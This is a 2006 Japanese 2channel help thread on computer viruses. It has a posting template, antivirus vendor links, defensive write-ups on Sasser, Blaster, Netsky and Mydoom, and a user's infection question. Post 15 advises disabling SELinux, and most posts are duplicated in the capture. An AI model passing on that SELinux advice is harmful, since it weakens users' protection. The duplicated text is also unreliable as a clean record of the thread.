【ウィルス情報質問 総合スレッド★Part41】
1 :名無しさん@お腹いっぱい。:
前スレ
【ウィルス情報質問 総合スレッド★Part39】※実質40
http://pc8.2ch.net/test/read.cgi/sec/1163555394/
テンプレ
【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】
【ウィルス情報質問 総合スレッド★Part39】※実質40
http://pc8.2ch.net/test/read.cgi/sec/1163555394/
テンプレ
【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】
|
|
|
2 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:01:09
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:01:40
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
4 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:02:11
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
5 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:02:44
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
6 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:03:15
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
7 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:03:50
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ウイルス情報 Part59
http://tmp6.2ch.net/test/read.cgi/download/1165372312/
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part9
http://pc8.2ch.net/test/read.cgi/sec/1158730729/
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイトを見たら…助けてください!Part62
http://pc7.2ch.net/test/read.cgi/pcqa/1150380799/
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ウイルス情報 Part59
http://tmp6.2ch.net/test/read.cgi/download/1165372312/
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part9
http://pc8.2ch.net/test/read.cgi/sec/1158730729/
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイトを見たら…助けてください!Part62
http://pc7.2ch.net/test/read.cgi/pcqa/1150380799/
8 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:04:22
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html
関連スレッド
オンラインによるウイルスチェックサービス
http://pc8.2ch.net/test/read.cgi/sec/1031073684/
※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
他社のオンラインスキャンをするとウイルスが検出されることがあります
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html
関連スレッド
オンラインによるウイルスチェックサービス
http://pc8.2ch.net/test/read.cgi/sec/1031073684/
※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
9 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:05:22
関連スレッド
セキュリティ初心者質問スレッドpart79
http://pc8.2ch.net/test/read.cgi/sec/1165470988/
Winnyを狙ったワーム・ニュイルス情報 Part59
http://tmp6.2ch.net/test/read.cgi/download/1165372312/
☆☆トロイの木馬☆☆3台目
http://pc8.2ch.net/test/read.cgi/sec/1132660933/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc8.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc8.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc8.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc8.2ch.net/test/read.cgi/sec/1086494732/
【分析】HijackThis【研究】
http://pc8.2ch.net/test/read.cgi/sec/1091346741/
関連スレは次スレに移行してる場合もあります。
質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
セキュリティ初心者質問スレッドpart79
http://pc8.2ch.net/test/read.cgi/sec/1165470988/
Winnyを狙ったワーム・ニュイルス情報 Part59
http://tmp6.2ch.net/test/read.cgi/download/1165372312/
☆☆トロイの木馬☆☆3台目
http://pc8.2ch.net/test/read.cgi/sec/1132660933/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc8.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc8.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc8.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc8.2ch.net/test/read.cgi/sec/1086494732/
【分析】HijackThis【研究】
http://pc8.2ch.net/test/read.cgi/sec/1091346741/
関連スレは次スレに移行してる場合もあります。
質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
10 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:11:06
テンプレここまで
∧_∧
( ・∀・) トロイ〜ワーム!!!
( ⊃┳⊃
ε(_)ヘ⌒ヽフ
( ( ・ω・)
≡≡≡ ◎―◎⊃⊃
テンプレここまで
∧_∧
( ・∀・) トロイ〜ワーム!!!
( ⊃┳⊃
ε(_)ヘ⌒ヽフ
( ( ・ω・)
≡≡≡ ◎―◎⊃⊃
テンプレここまで
11 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:36:51
>1 おつ〜
: :: ゚ : 。 〜 彡ミ
: ゚ :。 〜 彡ミ彡ミ
: 。 〜 : ゚ :: 彡ミ彡ミミミ
: . ::: 。 〜 : : .. ゚ 彡彡ミ彡ミミミ
. ゚ 〜 :: . : :. 。 ;:ヽ|i゚∀゚ i|ノ アヒャヒャヒャ
゚ :: ゚〜 : 。 : : : |i!iハlハl!|
: :: ゚ : 。 〜 彡ミ
: ゚ :。 〜 彡ミ彡ミ
: 。 〜 : ゚ :: 彡ミ彡ミミミ
: . ::: 。 〜 : : .. ゚ 彡彡ミ彡ミミミ
. ゚ 〜 :: . : :. 。 ;:ヽ|i゚∀゚ i|ノ アヒャヒャヒャ
゚ :: ゚〜 : 。 : : : |i!iハlハl!|
12 : ◆N9P3SuvBPo :2006/12/25(月) 22:41:21
>1
おつかれさ〜ん
おつかれさ〜ん
13 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:43:02
○< ̄ ̄\
γ )
[二二二]
γ⌒ヽ从*‘ー‘从<Merry Xmasだぎゃ!
| ∩3\,,/[]つ
| Y__:_)
. \__(__)__)
14 :名無しさん@お腹いっぱい。:2006/12/25(月) 23:25:37
>>1
乙..._〆(゚▽゚*)
乙..._〆(゚▽゚*)
15 :名無しさん@お腹いっぱい。:2006/12/26(火) 02:29:22
どうでもいい事だが
Vistaへの乗り換えに自信のない人に自信を持ってお勧めできる無料OS、それがFedora Core
サンプル動画
高画質 http://stage6.divx.com/members/225743/videos/1032106
低画質 http://www.youtube.com/watch?v=ksxADo-4Q4k
サンプル画像
http://sylphys.ddo.jp/upld2nd/pc2/src/1166337336209.jpg
http://sylphys.ddo.jp/upld2nd/pc2/src/1166337908690.jpg
http://www.lynucs.org/index.php?screen_id=16160218054558aaec4d948&p=screen
http://www.lynucs.org/index.php?screen_id=12170238984554b554f0ad2&p=screen
FedoraというのはLinuxの一種で日本で最も普及しているLinux
インストールは ftp://ftp.sfc.wide.ad.jp/pub/Linux/Fedora/6/i386/iso/FC-6-i386-DVD.iso
のisoをDVDに焼いてパソコンを再起動すればいい
注意としてDVDはイメージとしてisoを焼くようにしないといけない
http://linux2ch.is.land.to/index.php?InstallCDCreationInfo が参考になるぞ
CDブート後の手順は http://itpro.nikkeibp.co.jp/article/COLUMN/20061101/252399/?ST=lin-os&P=2 を見てくれ。
アドバイスだが「SELinuxの設定」は無効にしておくことをお勧めする。
Windowsの管理者(Administrator)にあたるユーザーは、Linuxでは「root」という名前だ
そのままだとファイラーの設定が良くない→ http://linux2ch.is.land.to/index.php?GNOMEFAQs#a3077218
ゴミ箱には保存場所の記録がないらしい(KDEというのならある)
特許の関係で動画と音楽の再生に制限がある。divxとかはxine、mplayer,vlcなど自分でソフトを入れてくれ
ソフト更新ツールが少し重くて遅いことは勘弁してほしい
ウイルスの心配のないネット生活をエンジョイだ
初心者質問大歓迎掲示板↓
http://pc8.2ch.net/test/read.cgi/linux/1165323756/
実はMandriva Linux(Mandrake)の方が優れているとばっちゃが言ってた
http://pc8.2ch.net/test/read.cgi/linux/1099123314/768n-
Vistaへの乗り換えに自信のない人に自信を持ってお勧めできる無料OS、それがFedora Core
サンプル動画
高画質 http://stage6.divx.com/members/225743/videos/1032106
低画質 http://www.youtube.com/watch?v=ksxADo-4Q4k
サンプル画像
http://sylphys.ddo.jp/upld2nd/pc2/src/1166337336209.jpg
http://sylphys.ddo.jp/upld2nd/pc2/src/1166337908690.jpg
http://www.lynucs.org/index.php?screen_id=16160218054558aaec4d948&p=screen
http://www.lynucs.org/index.php?screen_id=12170238984554b554f0ad2&p=screen
FedoraというのはLinuxの一種で日本で最も普及しているLinux
インストールは ftp://ftp.sfc.wide.ad.jp/pub/Linux/Fedora/6/i386/iso/FC-6-i386-DVD.iso
のisoをDVDに焼いてパソコンを再起動すればいい
注意としてDVDはイメージとしてisoを焼くようにしないといけない
http://linux2ch.is.land.to/index.php?InstallCDCreationInfo が参考になるぞ
CDブート後の手順は http://itpro.nikkeibp.co.jp/article/COLUMN/20061101/252399/?ST=lin-os&P=2 を見てくれ。
アドバイスだが「SELinuxの設定」は無効にしておくことをお勧めする。
Windowsの管理者(Administrator)にあたるユーザーは、Linuxでは「root」という名前だ
そのままだとファイラーの設定が良くない→ http://linux2ch.is.land.to/index.php?GNOMEFAQs#a3077218
ゴミ箱には保存場所の記録がないらしい(KDEというのならある)
特許の関係で動画と音楽の再生に制限がある。divxとかはxine、mplayer,vlcなど自分でソフトを入れてくれ
ソフト更新ツールが少し重くて遅いことは勘弁してほしい
ウイルスの心配のないネット生活をエンジョイだ
初心者質問大歓迎掲示板↓
http://pc8.2ch.net/test/read.cgi/linux/1165323756/
実はMandriva Linux(Mandrake)の方が優れているとばっちゃが言ってた
http://pc8.2ch.net/test/read.cgi/linux/1099123314/768n-
スレタイを【】で囲ってしまった orz
17 :ひみつの検疫さん:2024/05/01(水) 00:47:36 ID:MarkedRes
汚染を除去しました。
18 :名無しさん@お腹いっぱい。:2006/12/26(火) 22:50:34
【使用OS】 デスクトップ
【MicrosoftUpdate】 127.0.0.1にリダイレクトされて出来ない
【使用セキュリティソフト】 F-Secure InternetSecurity 2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 できない
【どんな症状が出るか】 EXEファイル実行不可
【症状が出る前に何をやったか】 友達から届いたメールの添付ファイルを開いた
【症状を解決しようとどのような処置を取ったか】 あわててスイッチ切って再起動した
【その他の質問】 友達から届いたから安心して開いたんですが、ウイルスなんでしょうか?
【MicrosoftUpdate】 127.0.0.1にリダイレクトされて出来ない
【使用セキュリティソフト】 F-Secure InternetSecurity 2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 できない
【どんな症状が出るか】 EXEファイル実行不可
【症状が出る前に何をやったか】 友達から届いたメールの添付ファイルを開いた
【症状を解決しようとどのような処置を取ったか】 あわててスイッチ切って再起動した
【その他の質問】 友達から届いたから安心して開いたんですが、ウイルスなんでしょうか?
19 : ◆N9P3SuvBPo :2006/12/26(火) 23:00:19
>18
まず、↓なw
>【使用OS】 デスクトップ
それPCの形態でOSではないから。
>【どんな症状が出るか】 EXEファイル実行不可
その拡張子がexeのファイルを実行しようとしたとき、何かエラーメッセージ
とかは出ない?
拡張子をcomに変えても実行は出来ないの?
手っ取り早い解決方法としてリカバリを奨めるけど?
>【その他の質問】 友達から届いたから安心して開いたんですが、ウイルスなんでしょうか?
友達からだろうと添付ファイルはウイルスと疑ってかかれ。
まず、↓なw
>【使用OS】 デスクトップ
それPCの形態でOSではないから。
>【どんな症状が出るか】 EXEファイル実行不可
その拡張子がexeのファイルを実行しようとしたとき、何かエラーメッセージ
とかは出ない?
拡張子をcomに変えても実行は出来ないの?
手っ取り早い解決方法としてリカバリを奨めるけど?
>【その他の質問】 友達から届いたから安心して開いたんですが、ウイルスなんでしょうか?
友達からだろうと添付ファイルはウイルスと疑ってかかれ。
21 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:39:06
22 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:43:20
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
俺は入れ直しかノートンゴースト使ってるけど
だれかおしえてちょんまげ
やっぱり2000で98でルータ無しFW無しはまずいんだね、
そこまでは俺も知ってたけど、でもどのような感染経路で感染するの?
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
それとさ、なんでこれ41なの?前39だったよね・・
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
俺は入れ直しかノートンゴースト使ってるけど
だれかおしえてちょんまげ
やっぱり2000で98でルータ無しFW無しはまずいんだね、
そこまでは俺も知ってたけど、でもどのような感染経路で感染するの?
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど
